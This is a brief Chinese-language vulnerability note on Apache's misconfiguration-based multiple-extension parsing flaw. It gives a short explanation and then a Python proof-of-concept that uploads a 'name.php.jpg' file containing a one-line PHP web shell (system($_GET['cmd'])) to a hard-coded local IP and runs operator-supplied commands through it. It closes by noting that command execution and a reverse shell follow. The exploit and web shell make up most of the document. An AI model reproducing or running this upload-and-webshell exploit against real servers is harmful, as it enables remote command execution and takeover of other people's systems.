Apache 解析漏洞

1.描述

• 该漏洞和apache版本和php版本无关,属于用户配置不当造成的解析漏洞。

2.原理

• Apache默认一个文件可以有多个以点分割的后缀，apache会从最右边开始识别其后缀名，如遇无法识别的后缀名则依次往左进行识别
• 该漏洞和apache版本和php版本无关,属于用户配置不当造成的解析漏洞。

3.poc

• poc.py
  • import requests
    ​
    url = “http://192.168.76.138/”
    name = str(input(“Please input upload filename:”))
    hearders = {
       “Content-Type”: “multipart/form-data; boundary=—————————281340862315800489963965371984”
    }
    ​
    data=”’
    —————————–281340862315800489963965371984
    Content-Disposition: form-data; name=”file_upload”; filename=”{}.php.jpg”
    Content-Type: application/x-shellscript
    ​
    <?php @system($_GET[“cmd”]);?>
    —————————–281340862315800489963965371984–
    ”’
    ​
    res_post = requests.post(url=url,headers=hearders,data=data.format(name))
    res_post_status = int(res_post.status_code)
    ​
    if res_post_status == 200:
       u = “http://192.168.76.138/uploadfiles/{}.php.jpg?cmd={}”
       cmd = str(input(“Please input CMD:”))
       res_get = requests.get(url=u.format(name,cmd))
       res_get_status = int(res_get.status_code)
       if res_get_status == 200:
           print(“Apache parse vul is exist!”)
           # print(res_get.text)
       else:
           print(“Apache parse vul is not exist!”)

4.exp

• 上传成功可以执行系统命令
• 可以获得反弹shell